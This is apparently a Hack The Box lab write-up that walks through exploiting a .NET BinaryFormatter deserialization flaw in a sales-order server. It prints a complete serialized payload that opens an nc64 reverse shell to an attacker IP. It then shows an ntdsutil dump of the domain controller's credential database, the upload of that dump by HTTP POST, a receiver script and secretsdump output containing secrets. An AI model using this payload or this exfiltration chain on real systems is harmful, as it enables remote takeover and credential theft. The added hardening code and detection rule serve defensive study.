Deserialization Attack
After transferring the client-side program for the Sales Order application to a Windows environment, the executables were decompiled for an in-depth analysis, and Wireshark was used to capture the network traffic so that the execution flow could be followed packet by packet. This identified a critical vulnerability in the client-side program: it uses the vulnerable and obsolete BinaryFormatter type to serialize and deserialize .NET objects without implementing any input sanitization, rendering it susceptible to deserialization attacks.
Deserialization attacks exploit weaknesses in the process that turns serialized data back into objects, manipulating serialized objects so that the receiving program performs unauthorized actions. In the context of the .NET Framework, they specifically target the deserialization mechanisms of .NET applications. Particularly concerning is the BinaryFormatter type, a component of the .NET Framework that is notorious for being exploitable through malicious manipulation. Attackers leverage these weaknesses to compromise the integrity of .NET applications, potentially leading to remote code execution, privilege escalation, and unauthorized access to sensitive data. These threats emphasize the critical need for secure coding practices and vigilant input validation, especially where the BinaryFormatter type is involved, to defend against deserialization attacks in .NET applications.
Given that the BinaryFormatter type is confirmed to be present and used by the client-side program, there is a high probability that the server-side program employs it as well. The objective is to forge a malicious serialized payload for the server-side program to receive and deserialize; since no form of input sanitization is supposedly in place, the server-side program will execute the deserialized payload.
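To make the point concrete, an added example (not the Sales Order application's code) of the handler pattern described above beside a hardened replacement; the SalesOrder members, the method names and the switch to a JSON body are assumptions. The formatter rebuilds whatever the stream names before the result is ever cast to SalesOrder, so a type check after Deserialize comes too late, and Microsoft's guidance is to remove BinaryFormatter from untrusted-input paths rather than try to filter it.

```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text.Json;

// Stand-in for ScrambleLib.SalesOrder; the real class's members are not on the page.
public sealed class SalesOrder
{
    public string Customer { get; set; } = "";
    public string Product { get; set; } = "";
    public int Quantity { get; set; }
}

public static class OrderHandlers
{
    // Wire format seen on the page: "UPLOAD_ORDER;<base64 body>".
    private static byte[] BodyOf(string message)
    {
        string[] parts = message.Split(new[] { ';' }, 2);
        if (parts.Length != 2 || parts[0] != "UPLOAD_ORDER")
            throw new InvalidDataException("unexpected command");
        return Convert.FromBase64String(parts[1]);
    }

    // VULNERABLE pattern the page describes. BinaryFormatter rebuilds whatever
    // type graph the bytes name and runs its deserialization callbacks before
    // the cast can fail; the ERROR_GENERAL "Unable to cast object of type
    // SortedSet..." reply on the page is that late cast, after the payload ran.
    public static SalesOrder UnsafeHandle(string message)
    {
#pragma warning disable SYSLIB0011 // BinaryFormatter is obsolete and insecure
        var formatter = new BinaryFormatter();
        using var stream = new MemoryStream(BodyOf(message));
        return (SalesOrder)formatter.Deserialize(stream);
#pragma warning restore SYSLIB0011
    }

    // HARDENED replacement: a data-only serializer that carries no type names,
    // so the body can only become a SalesOrder or be rejected. Field validation
    // still happens here, after a safe parse rather than instead of one.
    public static SalesOrder SafeHandle(string message)
    {
        SalesOrder order = JsonSerializer.Deserialize<SalesOrder>(BodyOf(message))
                           ?? throw new InvalidDataException("empty order");
        if (string.IsNullOrWhiteSpace(order.Customer) || order.Quantity <= 0)
            throw new InvalidDataException("invalid sales order");
        return order;
    }
}
```

System.Text.Json is built into .NET Core 3.0 and later and available as a NuGet package on .NET Framework, which is the assumed target here.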
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ cat payload.txt
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAMAgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAABAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYISVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAASVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAADMvYyBDOlxcVGVtcFxcbmM2NC5leGUgMTAuMTAuMTYuOCAxMjM0IC1lIHBvd2Vyc2hlbGwGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAAJIBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZ10sW1N5c3RlbS5TdHJpbmddLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAAhtc2NvcmxpYgoGDQAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIGAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYVAAAAB0NvbXBhcmUJDAAAAAYXAAA
ADVN5c3RlbS5TdHJpbmcGGAAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGQAAACRTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nXV0JDAAAAAoJDAAAAAkXAAAACRUAAAAKCw==
Now that the payload is ready, I can send it to the server-side program of the Sales Order application.
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ cat payload.txt | nc $IP 4411
SCRAMBLECORP_ORDERS_V1.0.3;
ERROR_GENERAL;Error deserializing sales order: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'ScrambleLib.SalesOrder'.
Sending
┌──(kali㉿kali)-[~/…/smb/IT/Apps/Sales Order Client]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.168] 60231
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
DC1
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::248
IPv6 Address. . . . . . . . . . . : dead:beef::489:296d:9719:61ba
Link-local IPv6 Address . . . . . : fe80::489:296d:9719:61ba%14
IPv4 Address. . . . . . . . . . . : 10.10.11.168
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%14
10.10.10.2
System Level Compromise
Hashdump
PS C:\Windows\system32> powershell -ep bypass -nop -c "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Temp\LSA' q q"
c:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
c:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\Temp\LSA
Creating snapshot...
Snapshot set {608a152d-376f-48b3-b938-fae087f7aac3} generated successfully.
snapshot {12553cfc-bc1a-4256-9830-c30bbaa63087} mounted as c:\$SNAP_202311210115_VOLUMEC$\
Snapshot {12553cfc-bc1a-4256-9830-c30bbaa63087} is already mounted.
Initiating DEFRAGMENTATION mode...
source database: C:\$SNAP_202311210115_VOLUMEC$\Windows\NTDS\ntds.dit
target database: c:\Temp\LSA\Active Directory\ntds.dit
Defragmentation Status (omplete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
copying c:\Temp\LSA\registry\SYSTEM
copying c:\Temp\LSA\registry\SECURITY
Snapshot {12553cfc-bc1a-4256-9830-c30bbaa63087} unmounted.
ifm media created successfully in c:\Temp\LSA
ifm: q
c:\Windows\system32\ntdsutil.exe: q
Dumping the LSA secrets with the LOLBAS ntdsutil.exe
PS C:\Windows\system32> Compress-Archive -Path C:\Temp\LSA\* -DestinationPath C:\Temp\secret.zip
PS C:\Windows\system32> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile 'C:\Temp\secret.zip'
Archiving the secrets into secret.zip and sending the file over an HTTP POST request
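A detection-side illustration of the on-host sequence above, added here and not part of the original writeup: it scans process command lines in execution order (collection from Security 4688 or Sysmon Event ID 1 is assumed to exist) for the ntdsutil IFM export followed by archiving and upload. The class name, severities and sample lines are constructed.

```csharp
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;

// Stage-aware detector: an ntdsutil IFM export (copies ntds.dit plus the
// SYSTEM/SECURITY hives), the export being archived, and the archive being
// uploaded with Invoke-WebRequest -InFile. Later stages only count once an
// export has been seen, which keeps routine Compress-Archive use quiet.
public static class NtdsIfmExfilDetector
{
    private static readonly Regex IfmExport =
        new Regex(@"ntdsutil.*\bifm\b.*create\s+full", RegexOptions.IgnoreCase);
    private static readonly Regex Upload =
        new Regex(@"\b(iwr|invoke-webrequest)\b.*-infile", RegexOptions.IgnoreCase);

    public static List<string> Scan(IEnumerable<string> commandLines)
    {
        var alerts = new List<string>();
        bool ifmSeen = false;
        foreach (string cmd in commandLines)
        {
            if (IfmExport.IsMatch(cmd))
            {
                ifmSeen = true;   // high confidence alone: IFM exports are rare outside DC builds
                alerts.Add("HIGH ntdsutil IFM export: " + cmd);
            }
            else if (ifmSeen && cmd.IndexOf("compress-archive", StringComparison.OrdinalIgnoreCase) >= 0)
                alerts.Add("MEDIUM archive created after IFM export: " + cmd);
            else if (ifmSeen && Upload.IsMatch(cmd))
                alerts.Add("HIGH file upload after IFM export: " + cmd);
        }
        return alerts;
    }

    public static void Main()
    {
        // Constructed sample modelled on the transcript above, plus benign noise.
        string[] sample =
        {
            @"C:\Windows\system32\svchost.exe -k netsvcs -p",
            @"powershell -ep bypass -nop -c ""ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Temp\LSA' q q""",
            @"powershell Compress-Archive -Path C:\Temp\LSA\* -DestinationPath C:\Temp\secret.zip",
            @"powershell iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile 'C:\Temp\secret.zip'",
        };
        foreach (string alert in Scan(sample))
            Console.WriteLine(alert);   // one alert per stage, three in total
    }
}
```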
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ cat post.py
from http.server import BaseHTTPRequestHandler, HTTPServer


class MyRequestHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Read exactly the body the client declared and save it to disk
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        with open('secret.zip', 'wb') as f:
            f.write(data)
        # Finish the response so the uploading client does not hang
        self.send_response(200)
        self.end_headers()


httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ python3 post.py
10.10.11.168 - - [21/Nov/2023 02:21:45] "POST / HTTP/1.1" 200 -
A local Python web server receives and saves the archive
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ unzip secret.zip
Archive:  secret.zip
warning:  secret.zip appears to use backslashes as path separators
  inflating: Active Directory/ntds.dit
  inflating: Active Directory/ntds.jfm
  inflating: registry/SECURITY
  inflating: registry/SYSTEM
Extracting
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/hashdump]
└─$ impacket-secretsdump local -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY -outputfile hashdump
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x33d8cbadba9e3f89bd60e5bfe64743e3
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$machine.acc:plain_password_hex:5269bba2bad286c317ec1bb4568b061d06e79c4e76f176b0c921ffeabcd6777b46aa7f8e3108233c2d75153934b179e7eb4ea96d65eb0b413612ddef56954a0588b84c3917b3fa25c9915b8f1c81a3b7b816f47d0ca71ef5a27d0da5d32d99f5c2f8a68f9f8890b8b32669d64ad2db7638bcb7691d8c03669fb4af6a2cf7e17b7898785560c0feb682135a41be892384388d6d4d376d17cb46130abe4ea3c320b34ef8524159e824e1b003fa5c50d0020f0e6e3ec355106f0c61a5fd6e16de87611971a2ddb66435c18eb80bc22164b9569212e83405b610cf0c0b7d4cf3379d23b7118a32163b629ab21bc308edea9b
$machine.acc: aad3b435b51404eeaad3b435b51404ee:594093e0491c6a7cf0bbc79ccba44cbb
[*] DPAPI_SYSTEM
dpapi_machinekey:0x4ab612c4226c2692f6ce3f80641ce3e4408d239d
dpapi_userkey:0xb6e5e458779f178490f1f538817c9a32b569b4f0
[*] NL$KM
0000 62 71 97 10 59 D7 07 E3 89 26 B4 42 EC 2B FA 4F bq..Y....&.B.+.O
0010 76 3D 66 31 E5 EF 65 1A C0 92 DD 19 D6 8B A1 26 v=f1..e........&
0020 9F 3F F7 12 07 ED CB 12 BE 39 F4 41 ED 98 F1 77 .?.......9.A...w
0030 E4 82 6C 19 7E CA 24 B3 A7 81 C7 72 AD E0 30 A0 ..l.~.$....r..0.
nl$km:6271971059d707e38926b442ec2bfa4f763d6631e5ef651ac092dd19d68ba1269f3ff71207edcb12be39f441ed98f177e4826c197eca24b3a781c772ade030a0
[*] _SC_MSSQLSERVER
(unknown user):Pegasus60
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] pek # 0 found and decrypted: ef94c97fa7aa487976e212fe89d89cf9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
[*] Kerberos keys from Active Directory/ntds.dit
[*] Cleaning up...
Domain Level Compromise